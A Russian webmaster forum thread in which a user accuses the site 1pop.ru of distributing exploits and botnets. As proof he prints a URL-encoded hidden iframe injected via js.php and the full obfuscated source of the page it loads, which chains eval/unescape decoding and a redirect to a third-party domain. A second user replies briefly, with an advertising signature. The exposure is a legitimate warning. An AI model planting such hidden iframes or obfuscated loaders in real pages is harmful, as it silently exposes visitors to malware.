1POP.RU распространяет эксплойты и ботнеты. Доказательство (+)

FilmzIn
На сайте с 23.08.2008
Offline
21
630

Любой может открыть у себя в браузере http://1pop.ru/js.php и увидеть там кусок кода

%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%75%70%6F%69%73%6B%2E%69%6E%2F%38%35%38%32%32%32%36%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61%6D%65%3E

Этот кусок кода можно расшифровать здесь - http://www.ph4.ru/wm_html2js.ph4

После дешифровки появится вызов страницы

rupoisk.in/8582226.html
(в iframe'е). Открывать эту ссылку не рекомендую, но исходник ее - вот:
<html><head><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><meta http-equiv='Refresh' content='0; url=http://bigtopescorts.cn/in.cgi?id1013' /><script>l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;OO0O=new Array();OO0O[0]='<html>\r';OOOO='fu';OOO0='EwSOhGbhdqtLceoy';OOOO+='nction __'+'__(_'+'O0){';O0O0='var%20%6C%32%3D%77%69\156d%6F%77%2E\157pe\162\141%3F%31%3A%30%3B%66unc\164io%6E%20l%33%28l%34%29%7Bl%35%3D%2F%7A%61%2Fg%3B\154%36%3D%53t\162i\156g%2Efr%6F%6D%43h%61%72\103ode%28%30%29%3B\154%34%3Dl%34%2E\162\145\160\154ace%28%6C%35%2C\154%36%29%3Bva%72%20%6C%37%3Dne%77%20\101%72r\141%79%28%29%2C\154%38%3D%5F%31%3D%6C%34%2El\145n\147%74%68%2C%6C%39%2ClI%2C%69\154%3D%31%36%32%35%36%2C%5F%31%3D%30%2C%49%3D%30%2C%6C\151%3D%27%27%3B%64%6F%7B%6C%39%3Dl%34%2E%63\150%61r\103%6Fde\101\164%28%5F%31%29%3BlI%3D\154%34%2E\143\150%61rCod%65At%28%2B%2B%5F%31%29%3B%6C%37%5BI%2B%2B%5D%3DlI%2Bil%2D%28\154%39%3C%3C%37%29%7Dwhi\154%65%28%5F%31%2B%2B%3C\154%38%29%3B%76a\162%20l%31%3D\156\145w';OO0O[0]+='\n~zaeader~\n ~ ';OOOO+='eva';OO00='OlIOsmbLUVTZIBJjxwQUXOjBraMPfMRalJYK';OOOO+='l(unes' +'cape(_O0))}';eval (OOOO);O0OO='OnCnleyvVEPWROqrQSOwbJOFMajOIDDBHphpYufwCFuXw';OOOO='';O0O0+='%20Arra%79%28%29%2C%6C%30%3Dn%65%77%20\101rr\141\171%28%29%2C\111%6C%3D%31%32%38%3Bdo%7B\154%30%5B%49l%5D%3D\123tr\151%6E%67%2E%66r\157\155%43h%61r\103o\144e%28Il%29%7D%77h%69%6C\145%28%2D%2D\111%6C%29%3B\111l%3D%31%32%38%3B\154%31%5B%30%5D%3D\154%69%3D%6C%30%5Bl%37%5B%30%5D%5D%3B%6C\154%3Dl%37%5B%30%5D%3B%5F%6C%3D%31%3B\166%61%72%20l%5F%3Dl%37%2E\154e\156%67%74h%2D%31%3Bwhi%6C\145%28%5Fl%3C%6C%5F%29%7B\163w%69t%63\150%28\154%37%5B%5F%6C%5D%3C%49%6C%3F%31%3A%30%29%7B%63%61\163%65%20%30%20%3Al%30%5B\111\154%5D%3D\154%30%5Bl\154%5D%2B\123\164%72ing%28%6C%30%5B\154\154%5D%29%2E\163u%62%73\164r%28%30%2C%31%29%3Bl%31%5B%5F%6C%5D%3Dl%30%5BIl%5D%3Bi\146%28%6C%32%29%7Bl%69%2B%3Dl%30%5BI\154%5D%7D%3Bb\162\145a';O000='l';OO0O[0]+='~</h~ ~~\r~~~~';O0O0+='k%3Bde%66%61u%6C%74%3A\154%31%5B%5F%6C%5D%3Dl%30%5Bl%37%5B%5F%6C%5D%5D%3Bi\146%28l%32%29%7Bl%69%2B%3D%6C%30%5Bl%37%5B%5F%6C%5D%5D%7D%3B%6C%30%5BI\154%5D%3Dl%30%5Bl%6C%5D%2BS%74%72\151ng%28\154%30%5B%6C%37%5B%5Fl%5D%5D%29%2E\163\165bst\162%28%30%2C%31%29%3B\142re%61%6B%7D%3B\111l%2B%2B%3B\154%6C%3D\154%37%5B%5F\154%5D%3B%5F\154%2B%2B%7D%3B%69f%28%21\154%32%29%7B%72e\164urn%28\154%31%2Ej%6F%69\156%28%27%27%29%29%7D%65\154\163\145%7B\162\145%74\165r%6E%20l%69%7D%7D%3B%76%61%72%20%6CO%3D%27%27%3B\146\157\162%28i%69%3D%30%3Bi\151%3CO\117%30%4F%2Elen%67th%3B\151i%2B%2B%29%7B%6C%4F%2B%3D%6C%33%28\117O%30O%5Bi\151%5D%29%7D%3B%69f%28naa%29%7B%64%6Fcu%6De%6E\164%2Ew\162%69t\145%28l%4F%29%7D%3B';O0OO ='OOKvTJxOZHGqcHOnEiDmqUHEwSOhGbhdqtLceoytOlIOsmbLUVTZIBJjxwQUXOj';____ (O0O0);O000+='tZrqWCVFKgKWQdaBYtkgtNOuhrSNmoZpvGsOghfkLTODRQcfiaCTLsObxOdroOkNNluJiFgIOxOibvdDkvEyMOoxyKeOGIlsPXMojkinOemGdctilcFfOLqeCpfuHnnOOENOBWy';</script></head><body></body></html>

Есть и другие данные - пока в процессе сбора информации...

RT
На сайте с 12.09.2006
Offline
598
#1

и зачем это?

вроде же писали уже про них,в той теме и написали бы ;)

InstallMonster.ru (installmonster.ru)-бомба файлового траффика. В 2 раза выгоднее конкурентов! ZipMonster.ru (http://zipmonster.biz/)-платные архивы. Конверт 1:4, 2р/открытие, хостинг!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий